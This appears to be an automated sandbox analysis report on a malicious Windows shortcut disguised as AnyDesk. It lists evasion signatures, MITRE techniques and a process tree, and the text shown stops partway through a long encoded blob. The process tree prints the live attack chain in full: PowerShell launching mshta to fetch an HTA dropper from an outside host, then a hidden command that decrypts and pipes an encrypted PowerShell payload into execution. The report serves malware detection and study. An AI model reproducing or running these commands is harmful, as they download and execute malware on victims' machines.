28cf80111581dd0915db20b2f446827507e4015149157bf869c8b7d9e82e18b9

Analysis

max time kernel
71s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
30-11-2022 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

anydesk.exe.lnk
Size

1KB
MD5

69efba8911a9f53798360f03b92f2226
SHA1

2da3aa791c3683ba2a7d42e7b5cf2504a5a19518
SHA256

0c92738f0f59039085bb50f833a7a228fe217b01b53257db5b43f3f146400859
SHA512

9baab4dce364377d9263d88b7cf948230e9cb633b61bcd62b2355840cd5ffe4cb86c6afb6eead0ce121d8be1c0c95c22d1ae18543368f479272de29e90fc44d5

Score

10^/10

evasion themida trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://zupermann.com/s/as.hta

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

build.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ build.exe
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

8 4384 mshta.exe
12 4384 mshta.exe
14 4384 mshta.exe
17 4384 mshta.exe
21 3084 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

build.exe

pid process

3904 build.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	build.exe

flow	pid	process
8	4384	mshta.exe
12	4384	mshta.exe
14	4384	mshta.exe
17	4384	mshta.exe
21	3084	powershell.exe

pid	process
3904	build.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	build.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	build.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exebuild.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	build.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\build.exe	themida
C:\Users\Admin\AppData\Roaming\build.exe	themida
behavioral2/memory/3904-199-0x0000000000630000-0x00000000010F0000-memory.dmp	themida
behavioral2/memory/3904-200-0x0000000000630000-0x00000000010F0000-memory.dmp	themida
behavioral2/memory/3904-208-0x0000000000630000-0x00000000010F0000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

build.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA build.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

50 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

build.exe

pid process

3904 build.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	build.exe

flow	ioc
50	ip-api.com

pid	process
3904	build.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1212 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4384 taskkill.exe
424 taskkill.exe

pid	process
1212	timeout.exe

pid	process
4384	taskkill.exe
424	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAcroRd32.exebuild.exe

pid	process
664	powershell.exe
664	powershell.exe
3512	powershell.exe
3512	powershell.exe
4528	powershell.exe
3084	powershell.exe
3084	powershell.exe
4528	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
3904	build.exe
3904	build.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exebuild.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	664	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	3084	powershell.exe
Token: SeDebugPrivilege	372	powershell.exe
Token: SeDebugPrivilege	3904	build.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	424	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

756 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exe

pid process

756 AcroRd32.exe
756 AcroRd32.exe
756 AcroRd32.exe
756 AcroRd32.exe
756 AcroRd32.exe
756 AcroRd32.exe

pid	process
756	AcroRd32.exe

pid	process
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe
756	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.execmd.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 3540 wrote to memory of 664	3540	cmd.exe	powershell.exe
PID 3540 wrote to memory of 664	3540	cmd.exe	powershell.exe
PID 664 wrote to memory of 4384	664	powershell.exe	mshta.exe
PID 664 wrote to memory of 4384	664	powershell.exe	mshta.exe
PID 4384 wrote to memory of 3512	4384	mshta.exe	powershell.exe
PID 4384 wrote to memory of 3512	4384	mshta.exe	powershell.exe
PID 3512 wrote to memory of 2376	3512	powershell.exe	cmd.exe
PID 3512 wrote to memory of 2376	3512	powershell.exe	cmd.exe
PID 2376 wrote to memory of 4528	2376	cmd.exe	powershell.exe
PID 2376 wrote to memory of 4528	2376	cmd.exe	powershell.exe
PID 2376 wrote to memory of 3084	2376	cmd.exe	powershell.exe
PID 2376 wrote to memory of 3084	2376	cmd.exe	powershell.exe
PID 3084 wrote to memory of 756	3084	powershell.exe	AcroRd32.exe
PID 3084 wrote to memory of 756	3084	powershell.exe	AcroRd32.exe
PID 3084 wrote to memory of 756	3084	powershell.exe	AcroRd32.exe
PID 756 wrote to memory of 5100	756	AcroRd32.exe	RdrCEF.exe
PID 756 wrote to memory of 5100	756	AcroRd32.exe	RdrCEF.exe
PID 756 wrote to memory of 5100	756	AcroRd32.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4816	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4100	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4100	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4100	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4100	5100	RdrCEF.exe	RdrCEF.exe
PID 5100 wrote to memory of 4100	5100	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\anydesk.exe.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://zupermann.com/s/as.hta'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://zupermann.com/s/as.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $omHMoANH = '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';$qLhHyMkmn = 'UkR6aHh0dFNTVGdzdVlPd2pWc3d3U21hY09yaUtzSEU=';$SrCYeqlEMybRg = New-Object 'System.Security.Cryptography.AesManaged';$SrCYeqlEMybRg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SrCYeqlEMybRg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SrCYeqlEMybRg.BlockSize = 128;$SrCYeqlEMybRg.KeySize = 256;$SrCYeqlEMybRg.Key = [System.Convert]::FromBase64String($qLhHyMkmn);$xxyJt = [System.Convert]::FromBase64String($omHMoANH);$LhzQiNebtVuDjBpJ = $xxyJt[0..15];$SrCYeqlEMybRg.IV = $LhzQiNebtVuDjBpJ;$VoLaJfGGVKwWHb = $SrCYeqlEMybRg.CreateDecryptor();$CmpJAAIieWIMY = $VoLaJfGGVKwWHb.TransformFinalBlock($xxyJt, 16, $xxyJt.Length - 16);$SrCYeqlEMybRg.Dispose();$ITRSHNZAoB = New-Object System.IO.MemoryStream( , $CmpJAAIieWIMY );$mJoRxGkyAPH = New-Object System.IO.MemoryStream;$WIUvowurKQrWfasvYQ = New-Object System.IO.Compression.GzipStream $ITRSHNZAoB, ([IO.Compression.CompressionMode]::Decompress);$WIUvowurKQrWfasvYQ.CopyTo( $mJoRxGkyAPH );$WIUvowurKQrWfasvYQ.Close();$ITRSHNZAoB.Close();[byte[]] $ZMksVyn = $mJoRxGkyAPH.ToArray();$VZPnG = [System.Text.Encoding]::UTF8.GetString($ZMksVyn);$VZPnG | powershell - }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $omHMoANH = 'AAAAAAAAAAAAAAAAAAAAAL3Fx6eYzYRkS8WCLVGKYvj/+iLh1+O/M4EOV9tH/3yW60atUVIinmgjdRpAMjnchnwU3zor9/T6GPuCVbvE4xkgxdgwYZVWp7nSJu/fv8bZCDuayl1e5rslibwNxQqU2LgA2Fr7jQ8ZgSddriDIlbQs3+bSF3SU5mVvpL5t0XxnQzJ6t292OAGONfd8HmcX1D6sBHMjiwcN5qQJtteksy/IHRr7FZ/FkEdiISTGcHPeIX/id09XRtx/6/Hchl+S8eBTzZjHQdZNjV3BCMXry1eot9P9EdgHoU3Sq71iAQmHyIVg+/v5du2zrVPTqOksNGlmMyKuOl0wU6kHwW/ZGF5TohSvXfiH2HDKjWngvaSrjWGVoQCpsJKd8rdj8TFWlGMOexWHvzK3/h2W+2fFPd/U7lSO2AgPCni8Wh0Y0iZe10PYv45A+NzyOsvI410MmXinvgJG6KWbLyoM+O+fgNoLsU5hmpZixPj9CG23gZBzNlbzr+d83ri0hFiKT6Kpu7hMUnKnqFA0QmdV3JkczR+J1w/RZlZ1wgBWTtEktHrdB56U0d0QfNTeIkwCHi3gszf/EDybb+2Y4J4HnqLmRL84e0f5EFEAr/TtwmfbbcFts5CtLbIPSM2nqn1euzIsIeuDHFwopu6G0BpP4OQtFbIoFhY8SlekjRlfYi8YzoJ/7TFnUu66mHvcL4io4I9EN/qxAMsyLnUdYiSp9xb9QDau01hGtXXQMPoFKZBkoOJLLcd35pUa7a0wMhE3ULWcj+rMpRKuiTMSGt5cHeDaXfDvG08e2R5Gt5dmZKlDJxuBHLL0STABZShOyD1rL7UBP4GhPnPqUxoPLOqfEfkVJhKN4zwqFqeBwdo68KAJ845tYgN5loqswgpLYvuQjLlFRXndSkpbWF5v76XXN3lrQDjd1Q/x3DgdXPJSpzndIqUhjmQnpILLJRu3Y+xE1N7wQS3RV8Wufk8LSeUdCp18Rc0Dc95lnsK9K3xLC77ZtwP1T7NOQgqdqMFmM/X+/R4pI563h82jD9FQ08ayfnm2YnTB+OMuUx8v/mTe+/pu2EZTT58+eaIBDXfIGezHZ/Ueb4uNY1uzST9Y4pMzxMZJpRRDqMysYch9RfPRAJD0h8zbM/IRuiN5+qo8YmC+OQssnY67sskrYJRRLIGU1X6OQDKMRqk1vOadLYZQ2Ab/c/iOmEabTqm3TYaYb17DcWj9oUXM4ibPP5Y3NqVOpYGLMgt6eT6EP7guJueLVAysqFbtASzYA2X5l0/Lozfqg6UifqBN//TmD3BqINe6Gg/LhYdt8z26ewlfetacil5PsT2f3Jf6gYWdc0Z3eNNzRthIUgChouqJXrFtahxTa3QZxvAkGet131JdiY9PW2x2EVD0a7Ncb2ehsskZWC9v1hObkNarOnuntKfCweRCfqXpzSQda36LPfq0xB7hKE6Qat/gXz9J+GxYMXZt/E9Ui/UnlEw7OWLwmfF5H9HfiBlywLwuWkMA5nXbjpW5jNPRoVG3SaWyz9EYFshTbtFJXOvW+bS59TRHF0GbF+zaLXqONenvf407+VAdWcRRcaX8YKTCNMLJ/0fsf3K0ZNwFLZLuSi4icgHKdojlZl3535XWeGPtwJ4JHJE26bwSTjQoxBN9t7imSVwrhS24zxjLqb90S6/2B4HRjXF0BgEeLG005vFrsxsQMs823YFcFuJn+JUaMf8iSNcshrqDXOyiDnF5InTNZRRQ7G5r5SnBAhU/TQwfpGb+MIkhV3Yr+ykH65PEFdabDw/oyv64hA8TVUGPrOgO6eTE2iLOiBEhaWOf+JEfkE+vvIeeFiOYb/8jqGFWJW5URxtfgzDzDT3zjjoHMxsKpxbong31rYR752x8COhWKsba5xPY0S67aE/boBWsVF1BaNi0weJGUx7+4o6evXjgTUjHdjfllzgVgTkz1hrR+z/TYCnOIk7t57zfUV0G/CRPC1VBm8fuVcXlnfNtGHnNrK6lXr0CTSAOSiJG5FRX8XZKLxSd1LhdhjpwpIZ5iXTwoRojyTeXrM9aG6NGNn3eXCjpaYEJgGD8NQZvNZsk8y/wXsIXydK/ONB9PJ0RIrPNl5H0nnQNG8VlrtKfct788Nva5t+vmnnMrDrFkYWTGOT7DDwXp6UNm+1PPjaFsmCkRt8eE8A5hhWW40pC7dhwHLaTKocd38MtkIuEgyIC32c9zw1WOyd0ZO3Zy2xENDdktgJyshZnJUTdxbw0K3+Re8VVuYq1eSIqC8Mb4G/rKMMJOIDrsXj3uUkMvou911ZrRuqgXuoGo4jI3/z6M0gjtDBV7+XvzJXqq+hDQJuWOipLfG2w4v7JK+unMPOTs9Fr5dZQ1Lv3aN2bVn2YAjAdtJBQR2nbID6lvq2DRvSi98OyaxPsdPKiraAq+Bm4ESr5FfCPQUoVXr4hC/XTJef+Y6m/aByrIk9lXKIbUt4cJRl164AZkxyVlhsICMqaefqAfccjUQDXrll7r4WqEJmkk/h0/46YU3i3NSXhhpYi9kUB5vQN5UW2MmdsMU2QVFTKfcQTpTDuIhBgUzflrNHz7xCYjvI3M3ErogibUhOPlxrDiYx0Pcw3XLe6utmNOJze03AArk1fm2juZumML9z3xW7nFclYWn3OKpS0Qufg4GaKlJhe3k7rJsfT2q2iwCjJCEFsmN3jgJ4Y7BG2L/RTaG75/5AIFzWJTTEhY5TwvAehJAr3Ile/5b3WRZ7JqcPDyuSaJeBInGucpxNIZ4d2o7vIIunlHSRY1oFkY01xvdRYsqdzf86Sk3RxuUhZHVARa1ZhmRsMT3Bi6hkfPIDg709ql/P4LLaDDdaN0dL+Lges6dH2Gzu00EZ5bfeATlmiNPf4XmAxqLjcq84IqPLH1aU7Zic29eyfjjFP2gLcEeYhZHQDxiEo5L3TvwM1XOcobeaG3mQEeAUeEvblmGKv15ylLq3GLjb06/gMwMOGtJv4PoJjJYDvK2avpfiqvFOS5pdZE9Y3gzpNfScLsSSCAvSCVfzA1D0ycLYrNvnLy24ypDMXR7HF/jJmnxqplyRaDD0qqdC9qpRdQrHkpEQdu5m3Ot6qAqzgW9OfouC0ImlvfP1mcjkSuLa6AYHzTGEyNa6lWADa787XPcBMa/1j5I3NNuWJamLwW97fn5IF+heKKy0X6lWCd7jo+jsHm0hf5+HwwWByEbNBKvxOIFEeSl5HKrSOd0wrlgobeWA5VY1P0MZTD0S0uZGlNRPL1DgzSuP3Q9AzUjqRrH4/3cfSbx8+8AOmKSuGoonUzVJ3qvto5vH7aSoMTIhJWdVTZqGXoyvG518iJ7GZ12+kyl7HMJTg2Rjd9Kyj0SvWT6ypaKk4xLFoVXxHaDQOWlRtILv6wZvEDQH4seQkLFiEI7gCIpQGnWo1dNn2z8604uIqoLzNq/EjpCmfA0nFJO9t02qZ/TLO2sbQbUo0iQdScakggqwVga1OfMiQNWgAhZJu7VsDO8bgVlDJfF8ZPzASSnRSHOhHV54vGpHN//joCKAK6app78bJMCnB2yJIZ1X5B+NDU+uU1su28X31P594kGBflZJqNVirXb22AINwmzCV+CAAM0jpdnj1RT6g6tzIhDHNt2EkidFVuw+R0hc